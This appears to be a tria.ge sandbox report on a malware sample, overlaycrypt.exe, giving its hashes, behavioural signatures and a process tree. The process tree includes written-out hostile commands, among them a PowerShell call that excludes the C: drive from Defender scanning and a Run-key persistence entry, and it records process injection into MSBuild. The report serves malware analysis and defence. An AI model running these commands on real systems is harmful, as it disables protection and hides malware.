Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
139s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
07/08/2023, 06:15
Static task
static1
Behavioral task
behavioral1
Sample
overlaycrypt.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
overlaycrypt.exe
Resource
win10v2004-20230703-en
General
-
Target
overlaycrypt.exe
-
Size
846KB
-
MD5
0f6ffc2e70d312972d592fd43d49b10c
-
SHA1
1be29b9bf2da79e428f3e2ed95b25880b72cbc0c
-
SHA256
7bcde76356cbd428ffd4fd3288f1f07d49db7d3d772b9671bfa2bb1f98a3ae17
-
SHA512
71daeb9d2c213caf896a0cfcad6336c29e5c0645248fd26805ffa915ec69886639c704a4b3e1c6cd9c1412dbfff041d8efc7b60aeae69ae79a18aa81d0f4a600
-
SSDEEP
12288:nByKFBp5YVGAVUOJNcTUW91MPSNZm6wZUkmLB7j/QFU0u0cql03za+9rSdfDG:EKrp5YoOJ41MCzwZU3LG9/2DayufD
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkService = "C:\\Users\\Admin\\AppData\\Roaming\\NetworkService.exe" overlaycrypt.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4504 set thread context of 3048 4504 overlaycrypt.exe 89 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 4504 overlaycrypt.exe 2336 powershell.exe 2336 powershell.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe 3048 MSBuild.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3048 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4504 overlaycrypt.exe Token: SeDebugPrivilege 2336 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 4504 wrote to memory of 4024 4504 overlaycrypt.exe 86 PID 4504 wrote to memory of 4024 4504 overlaycrypt.exe 86 PID 4504 wrote to memory of 4024 4504 overlaycrypt.exe 86 PID 4024 wrote to memory of 2336 4024 cmd.exe 88 PID 4024 wrote to memory of 2336 4024 cmd.exe 88 PID 4024 wrote to memory of 2336 4024 cmd.exe 88 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 4504 wrote to memory of 3048 4504 overlaycrypt.exe 89 PID 3048 wrote to memory of 1904 3048 MSBuild.exe 91 PID 3048 wrote to memory of 1904 3048 MSBuild.exe 91 PID 3048 wrote to memory of 1904 3048 MSBuild.exe 91 PID 1904 wrote to memory of 4728 1904 cmd.exe 93 PID 1904 wrote to memory of 4728 1904 cmd.exe 93 PID 1904 wrote to memory of 4728 1904 cmd.exe 93 PID 3048 wrote to memory of 3136 3048 MSBuild.exe 97 PID 3048 wrote to memory of 3136 3048 MSBuild.exe 97 PID 3048 wrote to memory of 3136 3048 MSBuild.exe 97 PID 3136 wrote to memory of 2844 3136 cmd.exe 99 PID 3136 wrote to memory of 2844 3136 cmd.exe 99 PID 3136 wrote to memory of 2844 3136 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\overlaycrypt.exe"C:\Users\Admin\AppData\Local\Temp\overlaycrypt.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\2⤵
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell set-mppreference -exclusionpath C:\3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\cmd.exe/c ""C:\Windows\System32\curl.exe" --output "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" --url https://msedge.sf.dl.delivery.mp.microsoft.com/filestreamingservice/files/f29ffab2-0ad8-427f-8002-e8d6568524f1/Microsoft.WebView2.FixedVersionRuntime.107.0.1418.42.x86.cab"3⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\curl.exe"C:\Windows\System32\curl.exe" --output "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" --url https://msedge.sf.dl.delivery.mp.microsoft.com/filestreamingservice/files/f29ffab2-0ad8-427f-8002-e8d6568524f1/Microsoft.WebView2.FixedVersionRuntime.107.0.1418.42.x86.cab4⤵PID:4728
-
-
-
C:\Windows\SysWOW64\cmd.exe/c ""C:\Windows\System32\expand.exe" "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" -F:* "C:\Users\Admin\AppData\Local\TE1NTUVR""3⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\expand.exe"C:\Windows\System32\expand.exe" "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" -F:* "C:\Users\Admin\AppData\Local\TE1NTUVR"4⤵
- Drops file in Windows directory
PID:2844
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
173.8MB
MD556d897c072901d6f6ab953b650ddb5a8
SHA1304b6bff606a2bfe3610de4015acef2f74aaeab6
SHA2565fe632de6bf14adde890b7ac74c62d3e493807858e5fa2e697898af8696cd698
SHA5124f631e5cca2c0c9f9c6347e2cf31933cf59aba098613ce6e4551685cdf47d1c3cc4d833020b85c59b35c150c5b5c032efa653b90b6bed4359ff43eacf7e39c5e